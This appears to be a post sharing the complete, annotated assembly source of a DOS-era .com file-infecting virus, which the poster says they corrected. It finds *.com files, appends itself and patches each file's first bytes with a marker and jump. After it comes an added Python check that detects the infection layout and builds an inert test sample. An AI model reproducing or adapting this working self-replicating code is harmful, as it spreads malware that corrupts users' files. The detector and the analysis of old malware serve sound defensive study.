The original had some errors, which I have corrected, and I also added some annotations of my own. After all, this is a 16-bit virus from the DOS era, so it is of little use now, though it seems antivirus software can still detect it, heh. If you want to study viruses, this is not a bad place to start. I have added some annotations of my own; if anything is unclear, feel free to get in touch with me.

VirusLength equ VirusEnd-VirusStart
code segment
        assume cs:code,ds:code,ss:code
        org 100h
main proc near
InfectedCode db 'M'
        db 3 dup(90h)
VirusStart:
        call WhereIAm
WhereIAm:
        pop si
        mov bp,si
        add si,Original4Bytes-WhereIAm
        mov di,100h
        movsw
        movsw                   ;Restore the host's first 4 bytes.
        mov si,bp
        mov ah,4eh
LooK4NextTarget:
        mov dx,offset Target-WhereIAm
        add dx,si
        mov cx,0
        int 21h                 ;Search for the first target file (*.com).
        jc error
        mov ax,3d02h
        mov dx,9eh
        int 21h
        jc error
        xchg ax,bx
        mov ah,3fh
        mov dx,si
        add dx,Original4Bytes-WhereIAm
        mov cx,4
        int 21h                 ;Read the first 4 bytes of the found file and store them in Original4Bytes.
        mov al,'M'
        cmp ds:[si+Original4Bytes-WhereIAm],al
        jz SickOrExe            ;Check whether it is an infected file or an exe file.
        mov ax,4202h
        xor cx,cx
        xor dx,dx
        int 21h                 ;Move to the end of the file.
        mov di,offset FourNewBytes-WhereIAm
        add di,2
        add di,si
        sub ax,4
        mov ds:[di],ax          ;Fill in the last two bytes of FourNewBytes.
;Now the 4 bytes mean:
;       dec bp
;       jmp xx  (jump to the end of the file, where the virus now starts)
        add si,VirusStart-WhereIAm
        mov ah,40h
        mov dx,si
        mov cx,VirusLength
        int 21h                 ;Copy the virus to the end of the file.
        mov si,bp
        jc error
        mov ax,4200h
        xor cx,cx
        xor dx,dx
        int 21h                 ;Move to the head of the file.
        mov ah,40h
        mov cx,4
        mov dx,si
        add dx,offset FourNewBytes-WhereIAm
        int 21h                 ;Write the 4 bytes of FourNewBytes over the start of the file.
        jc error
        mov ah,3eh
        int 21h                 ;Finished infecting, close the file.
SickOrExe:
        mov ah,4fh
        jmp Look4NextTarget
error:
        mov ax,100h
        push ax
        ret
main endp
Original4Bytes:
        ret                     ;The 'ret' here means: if no suitable file has been found, just return.
        db 3 dup(?)
Target db '*.com',0
FourNewBytes db 'M',0e9h,0,0
VirusEnd equ $
code ends
        end main
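A defender-side check for the on-disk layout the listing above produces, as an added example that is not part of the original post: a `.com` file that begins with `4D E9 rel16`, whose jump lands on a `call $+3` / `pop si` stub, with the `*.com` search mask somewhere after it. The function names are hypothetical and the sample file is constructed with inert filler bytes; the byte values are taken from the listing (`'M',0e9h`, `call WhereIAm` / `pop si`, `'*.com',0`).

```python
import struct

MARKER = 0x4D                                   # 'M' (decodes as DEC BP), the infection marker
JMP_NEAR = 0xE9                                 # JMP rel16, second byte of FourNewBytes
DELTA_STUB = bytes([0xE8, 0x00, 0x00, 0x5E])    # call WhereIAm / pop si
TARGET_MASK = b"*.com\x00"                      # the Target string in the appended body


def check_com(data: bytes) -> dict:
    """Collect structural indicators of the appender layout in a .com image."""
    r = {"marker": False, "jmp_to_tail": False, "delta_stub": False,
         "search_mask": False, "body_offset": None}
    if len(data) < 4 or data[0] != MARKER:
        return r
    r["marker"] = True
    if data[1] != JMP_NEAR:
        return r
    (rel16,) = struct.unpack_from("<H", data, 2)
    # The JMP occupies file offsets 1..3, so its target is file offset 4 + rel16.
    # The listing stores (original length - 4) there, i.e. the old end of file.
    body = (4 + rel16) & 0xFFFF
    if 4 <= body < len(data):
        r["jmp_to_tail"] = True
        r["body_offset"] = body
        tail = data[body:]
        r["delta_stub"] = tail.startswith(DELTA_STUB)
        r["search_mask"] = TARGET_MASK in tail
    return r


def verdict(data: bytes) -> str:
    r = check_com(data)
    if r["jmp_to_tail"] and r["delta_stub"] and r["search_mask"]:
        return "match"
    if r["marker"]:
        # Also true for an MZ executable named .com, which the listing skips too.
        return "marker-only"
    return "clean"


def constructed_sample(host_len: int = 32) -> bytes:
    """Constructed test image: NOP host plus an inert tail with the same layout."""
    host = b"\x90" * host_len
    tail = DELTA_STUB + b"\xCC" * 8 + TARGET_MASK   # filler, not the listing's code
    header = bytes([MARKER, JMP_NEAR]) + struct.pack("<H", host_len - 4)
    return header + host[4:] + tail
```

Treat `marker-only` as informational: the first-byte test alone is the same one the listing uses to skip files, so it also fires on any file with an `MZ` header.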
